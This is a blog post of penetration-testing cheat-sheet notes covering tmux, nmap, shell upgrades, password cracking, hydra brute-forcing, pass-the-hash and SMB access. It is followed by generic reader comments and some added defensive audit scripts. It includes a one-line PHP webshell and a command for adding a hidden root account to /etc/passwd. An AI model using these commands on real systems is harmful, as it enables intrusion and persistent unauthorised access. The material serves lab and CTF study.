Linux General
ctrl + r
Search History reverse
Run Script at startup
chmod 755 /path/to/the/script
update-rc.d /path/to/the/script defaults
update-rc.d -f /path/to/the/script remove
Delete Script from defaults
Vim
i
for insert mode
esc
to leave insert mode
To be continued with macros and all this handy shit
Tmux
Config from ippsec.
#set prefix
set -g prefix C-a
bind C-a send-prefix
unbind C-b
set -g history-limit 100000
set -g allow-rename off
bind-key j command-prompt -p "Join pane from:" "join-pane -s '%%'"
bind-key s command-prompt -p "Send pane to:" "join-pane -t '%%'"
set-window-option -g mode-keys vi
run-shell /opt/tmux-logging/logging.tmux
First press the prefix ctrl + a, then release the keys and press the combination you want.
tmux new -s [Name]
new named session
prefix + c
create new window
prefix + ,
Rename window
prefix + #
change panes
prefix + w
list windows
prefix + %
vertical split
prefix + "
horizontal split
prefix + s #
join pane
prefix + z
zoom in/out to panes
prefix + !
move the split pane into its own window
prefix + ]
enter vim mode
-> search with ? in vi mode
-> press space to start copying
-> press prefix + ] to paste
alt + .
cycle through arguments in history
tmux kill-session -t X
kill the session named X
prefix + &
kill pane
Nmap
nmap -sV -sC -p- -oN [FILE] [IP]
Standard
nmap -p- -sV -sC -A --min-rate 1000 --max-retries 5 -oN [FILE] [IP]
Faster, but ports could be overlooked because of the retransmission cap
nmap --script vuln -oN [FILE] [IP]
Local File Inclusion
Get the contents of all PHP files in base64 without executing them.
<?php echo passthru($_GET['cmd']); ?>
PHP Webshell
Upgrade Shell
python -c'import pty; pty.spawn("/bin/bash")'
Background Session with ctrl + z
stty raw -echo
stty -a
get row & col
stty rows X columns Y
Set rows and cols
Foreground Session again
fg #jobnumber
export TERM=xterm-color
enable clear (and other terminal-aware commands)
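The "stty -a" step above means reading the rows and columns off the screen by eye. The little helper below, added here as an example and not part of the original post, parses them out of "stty -a" output instead; it understands both the GNU layout ("rows 50; columns 200;") and the BSD/macOS layout ("50 rows; 160 columns;"). The two sample lines are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): extract the terminal size from
# "stty -a" output so the "stty rows X columns Y" step can be scripted.

# tty_size: reads "stty -a" output on stdin, prints "ROWS COLUMNS".
tty_size() {
    awk 'NR == 1 {
        for (i = 1; i <= NF; i++) {
            # GNU stty: "rows 50;"   -> the number follows the keyword
            # BSD stty: "50 rows;"   -> the number precedes the keyword
            if ($i == "rows")     r = $(i + 1)
            if ($i == "rows;")    r = $(i - 1)
            if ($i == "columns")  c = $(i + 1)
            if ($i == "columns;") c = $(i - 1)
        }
        sub(/;$/, "", r); sub(/;$/, "", c)   # drop the trailing ";" (GNU form)
        print r, c
    }'
}

# Constructed sample first lines of "stty -a" on the two platforms.
GNU_STTY='speed 38400 baud; rows 50; columns 200; line = 0;'
BSD_STTY='speed 9600 baud; 40 rows; 160 columns;'

# Real use, in the terminal you are sitting at:  stty -a | tty_size
# then, in the upgraded shell:  stty rows <ROWS> columns <COLUMNS>
printf '%s\n' "$GNU_STTY" | tty_size
printf '%s\n' "$BSD_STTY" | tty_size
```

Only the first line of "stty -a" is looked at, because that is where both implementations print the size.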
Add Account/Password to /etc/passwd
Generate password
openssl passwd -1 -salt [Username] [PASSWD]
Then Add to passwd file
Username:generated password:UID:GID:root:/root:/bin/bash
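From the other side of the table: an entry like the one above is easy to spot if you look for it. The script below is an added example, not from the original post, and audits a passwd-formatted file for exactly the two things that line introduces: a password hash sitting in field 2 instead of in /etc/shadow, and a second UID 0 account. The sample passwd content and the hash value are constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the original post): audit /etc/passwd for a hash
# stored directly in the password field and for extra UID-0 accounts.

# Constructed sample passwd content; the $1$ hash is a placeholder, not real.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
backup2:$1$backup2$XXXXXXXXXXXXXXXXXXXXXX:0:0:root:/root:/bin/bash'

# audit_passwd FILE
# Prints one finding per line as "<reason>:<username>".
audit_passwd() {
    awk -F: '
        # passwd lines have 7 fields; skip anything else (blank lines etc.)
        NF < 7 { next }
        # anything other than x/*/!/!! in field 2 is a hash (or an empty
        # password) living in a world-readable file, crackable offline
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "!!" {
            print "hash-in-passwd:" $1
        }
        # any account besides root with UID 0 is a second superuser
        $3 == 0 && $1 != "root" { print "extra-uid0:" $1 }
    ' "$1"
}

tmp=$(mktemp)
printf '%s\n' "$SAMPLE_PASSWD" > "$tmp"
audit_passwd "$tmp"     # prints: hash-in-passwd:backup2 / extra-uid0:backup2
rm -f "$tmp"
```

On a real host run it as "audit_passwd /etc/passwd"; a clean system prints nothing, because every account has "x" in field 2 and only root has UID 0.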
SQLMap
Capture Request with Burp.
Save Request to File.
sqlmap -r [REQUEST] --level [X] --risk [Y]
Use SSH Key
Download & save
It is necessary to change the permissions on the key file, otherwise you have to enter a password!
chmod 600 [KEY]
ssh -i [KEY] [IP]
Searchsploit
searchsploit [TERM]
searchsploit -m exploits/solaris/local/19232.txt
Copy to local directory
Convert RPM Package to deb
alien [Package.rpm]
Bufferoverflows
Locate Overflow
pattern_create.rb -l [SIZE]
Start gdb and run
r [PATTERN]
Copy the segfault String
pattern_offset.rb [SEGFAULT STRING]
You get a match at exact offset X.
Now you know the EIP overwrite sits at offset X and how much space the buffer gives you.
Simple exploit development
Get Information about the binary.
checksec [Binary]
Search packetstorm for shellcode.
Remember to use correct architecture.
Work in progress above…
SNMP
Bruteforce community string
nmap -sU -p 161 [IP] -Pn --script=snmp-brute
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt [IP]
Community String is in both cases “private”
snmp-check [IP] -c public
snmpwalk -c public [IP] -v 2c
Hydra
hydra -l root -p admin 192.168.1.105 -t 4 ssh
hydra -L root -P File 192.168.1.105 -t 4 ssh
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.X
http-post-form "/login:username=^USER^&password=^PASS^:F=failed"
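What a hydra run against ssh looks like from the defender's side is a burst of "Failed password" lines from one source in the auth log. The script below is an added example, not from the original post: it counts failed ssh logins per source IP and per distinct username, so a brute-force (many failures, several usernames, one IP, a few seconds) stands out from a single mistyped password. The log lines are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post): flag ssh brute-force sources
# in a syslog-style auth log by counting "Failed password" lines per IP.

# Constructed sample auth log lines.
SAMPLE_AUTH_LOG='Jan 12 10:01:02 host sshd[1234]: Failed password for root from 192.168.1.50 port 40001 ssh2
Jan 12 10:01:03 host sshd[1235]: Failed password for invalid user admin from 192.168.1.50 port 40002 ssh2
Jan 12 10:01:03 host sshd[1236]: Failed password for root from 192.168.1.50 port 40003 ssh2
Jan 12 10:01:04 host sshd[1237]: Failed password for root from 192.168.1.50 port 40004 ssh2
Jan 12 10:01:09 host sshd[1240]: Accepted publickey for alice from 10.0.0.7 port 51000 ssh2
Jan 12 10:02:00 host sshd[1241]: Failed password for alice from 10.0.0.7 port 51001 ssh2'

# ssh_bruteforce_sources FILE THRESHOLD
# Prints "IP FAILURES DISTINCT_USERS" for every source IP with at least
# THRESHOLD failed password attempts, sorted by IP.
ssh_bruteforce_sources() {
    awk -v thr="$2" '
        /sshd\[[0-9]+\]: Failed password for / {
            user = ""; ip = ""
            for (i = 1; i <= NF; i++) {
                # "for invalid user NAME from" vs. "for NAME from"
                if ($i == "for") user = ($(i + 1) == "invalid") ? $(i + 3) : $(i + 1)
                if ($i == "from") ip = $(i + 1)
            }
            if (ip == "") next
            fails[ip]++
            if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        }
        END {
            for (ip in fails)
                if (fails[ip] >= thr) print ip, fails[ip], users[ip]
        }
    ' "$1" | sort
}

tmp=$(mktemp)
printf '%s\n' "$SAMPLE_AUTH_LOG" > "$tmp"
ssh_bruteforce_sources "$tmp" 3     # prints: 192.168.1.50 4 2
rm -f "$tmp"
```

On a Debian-style box the real input is /var/log/auth.log, e.g. "ssh_bruteforce_sources /var/log/auth.log 10". Note how the "-t 4" in the hydra lines above maps to four parallel connections from the same source, which is why the failures land within the same second.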
John the ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Crack zip Files
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' "file.zip"
Note: Be careful with the quotes!
Crack openssl encrypted files
#!/bin/bash
# try every candidate in rockyou against the encrypted file;
# one output file per candidate is written (see below)
while IFS= read -r password; do
openssl enc -d -aes-256-cbc -a -in file.txt.enc -k "$password" -out "$password-drupal.txt" 2>/dev/null
done < /usr/share/wordlists/rockyou.txt
After this you get one file for every Password tried.
ls -lS
Sort them by size and look for the one with a unique size, or grep the contents.
Pass the hash smb
With an NT hash the --pw-nt-hash flag is needed; the default is NTLM!
pth-smbclient \\\\10.10.10.107\\$ -W <DOMAIN> -U <USER> -L <IP> --pw-nt-hash <HASH>
List all shares on <IP>.
pth-smbclient \\\\10.10.10.107\\<SHARE> -W <DOMAIN> -U <USER> --pw-nt-hash <HASH>
Connect to <SHARE>.
FTP
wget -r ftp://[USER]:[PASSWORD]@[IP]/
Recursively download with ftp.
SMB Null Session
smbclient //10.10.10.X/IPC$ -W Workgroup -I 10.10.10.X -U ""
WFUZZ
wfuzz -z range,1-65600 --hc 500 "http://IP:PORT/dir?parameter=id&port=FUZZ"
Fuzz a range of ids/port numbers.
Wordlist with crunch
crunch 15 15 "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*?=walkthrough%&0123456789" -t 123456789012345@ > wordlist.txt
hashcat
sha256
hashcat --force -m 1400 --username hash.txt /usr/share/wordlists/rockyou.txt
Great content! Super high-quality! Keep it up! 🙂
Hi, I think that I saw you visited my blog so I came to “return the favor”. I’m attempting to
find things to enhance my site! I suppose it’s ok to use some of your ideas!!
Yeah sure!
You can certainly see your expertise within the article you write.
The world hopes for more passionate writers like you who are not afraid to say how they believe.
At all times follow your heart.
Thanks for the kind words
What’s happening, I am new to this, I stumbled upon this, I have discovered
it positively helpful and it has aided me out loads.
I’m hoping to contribute & assist other customers like it’s helped me.
Good job.
Thanks for the support.
Good day! I know this is kinda off topic but I was wondering if you knew where I could find a captcha plugin for
my comment form? I’m using the same blog platform as yours and I’m having trouble finding one?
Thanks a lot!
Quality content is the key to be a focus for the people to pay a visit the website, that’s what
this website is providing.
Thanks for your kind words it really motivated me
This is really interesting, You’re a very skilled blogger.
I have joined your rss feed and look forward to seeking more of your
fantastic post. Also, I have shared your website in my social networks!
Thanks buddy this motivated me more
Thanks buddy
Hiya, I am really glad I’ve found this info. Today bloggers publish just about gossip and internet stuff and this is actually frustrating. A good web site with interesting content, that’s what I need. Thank you for making this site, and I’ll be visiting again. Do you do newsletters by email?
Thanks for the support
Yesterday, while I was at work, my sister stole my iPad and tested to see if it can survive a thirty foot drop, just so she can be a youtube sensation. My apple ipad is now broken and she has 83 views. I know this is totally off topic but I had to share it with someone!
This really addressed my problem, thanks!
Then my motive is complete
I discovered your weblog web site on google and examine a number of of your early posts. Continue to keep up the superb operate. I just further up your RSS feed to my MSN News Reader. Searching for forward to reading extra from you in a while!…
thanks
great website
There’s certainly a lot to know about this issue. I like all of the points you made.